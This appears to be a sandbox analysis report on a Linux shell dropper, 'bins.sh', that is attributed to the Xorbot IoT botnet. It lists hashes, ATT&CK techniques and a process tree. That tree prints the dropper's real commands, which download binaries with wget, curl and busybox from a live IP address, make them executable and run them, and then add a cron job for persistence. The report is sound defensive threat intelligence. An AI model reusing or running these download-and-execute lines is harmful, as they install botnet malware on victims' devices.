xorbot | c8242f14c875afa35b81c88aca43b9616dcb459f5d4bde4c63089ae8a8e41bb4

Analysis

max time kernel
149s
max time network
152s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
02-12-2024 17:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

8dd8477a41d76f42eeb1f7c1c86cec30
SHA1

d5707dacacae6f85bcdc053011ca5cca9381e083
SHA256

c8242f14c875afa35b81c88aca43b9616dcb459f5d4bde4c63089ae8a8e41bb4
SHA512

075b27d936a5e688eff44679ee0ba046b6cccbab994934738456b7209c160871a083e8e95b4555d6ae276c10b6ca9c884a6a0870d195675f78acffc29a19f493
SSDEEP

192:09Vvuq1eyOISkUERNddwsFyIA6bnHFANNPQcrrdwTIA6bnBkkUERNANNPQcrI9Vb:09Vvuq1eyOIBFyIA6bnHPIA6bnV9Vvuq

Score

10^/10

xorbot botnet defense_evasion discovery execution persistence privilege_escalatio trojan

Malware Config

Signatures

Detects Xorbot 1 IoCs

botnet trojan

Processes:

resource	yara_rule
behavioral1/files/fstream-1.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmod

pid	Process
1522	chmod

Executes dropped EXE 1 IoCs

Processes:

wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv

ioc	pid	Process
/tmp/wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv	1523	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv

Renames itself 1 IoCs

Processes:

wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv

pid	Process
1524	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

Processes:

crontab

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.SoXRyv	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv

description	ioc	Process
File opened for reading	/proc/1331/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1610/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/448/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/724/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/736/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/881/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1109/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1263/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1543/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/35/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1533/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/12/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/162/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/476/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1124/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1577/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1623/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/28/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/167/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/333/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/550/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1554/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1587/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/84/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/126/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/428/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1502/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/471/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1185/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1624/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/238/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/662/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1048/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1593/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/24/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1249/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1581/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/157/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/610/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/927/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1082/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1296/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1612/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/490/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/528/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1144/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1368/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1148/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1245/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1548/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/426/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1025/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1386/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1549/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/26/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/30/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1060/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1505/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1574/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/455/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1531/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/29/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1179/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
File opened for reading	/proc/1315/cmdline	wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetcurlbusybox

description	ioc	Process
File opened for modification	/tmp/wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv	wget
File opened for modification	/tmp/wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv	curl
File opened for modification	/tmp/wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:1505
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:1506
- /usr/bin/wget
  wget http://216.126.231.240/bins/wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
  2⤵
  - Writes file to tmp directory
  PID:1507
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
  2⤵
  - Writes file to tmp directory
  PID:1512
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
  2⤵
  - Writes file to tmp directory
  PID:1521
- /bin/chmod
  chmod 777 wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
  2⤵
  - File and Directory Permissions Modification
  PID:1522
- /tmp/wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
  ./wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:1523
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:1525
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:1526
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:1527
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:1528
- /bin/rm
  rm wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv
  2⤵
  PID:1530
- /usr/bin/wget
  wget http://216.126.231.240/bins/Uvk6QaxqyfjxeUbcy2AyTezpBOVqUqW8uJ
  2⤵
  PID:1533
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/Uvk6QaxqyfjxeUbcy2AyTezpBOVqUqW8uJ
  2⤵
  PID:1534

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/wgxC23Z3v0EX3MNoKUsDvHRYAcvpDAluyv

Filesize
112KB

MD5
05d7857dcead18bbd86d2935f591873c

SHA1
34d18f41ef35f93d5364ce3e24d74730a4e91985

SHA256
2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70

SHA512
d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e

Download Submit
/var/spool/cron/crontabs/tmp.SoXRyv

Filesize
210B

MD5
2537d567fc360e4e5d447c322573be9c

SHA1
58fe5b63913ba8c4d619c56f01b492810c68dbf3

SHA256
2a6fd0f1d7c63d382c43405c42343474446544bfe63f9fe9e1a544dac6223f30

SHA512
e7c1d8ceab162be6515d38f687da57d8967596e91e0bd1f0b0c6dbbea388c5f762f8bb1d2a684a83e19bc62fbe2bd37e74b33509d5c83888f1279ac639677a06

Download Submit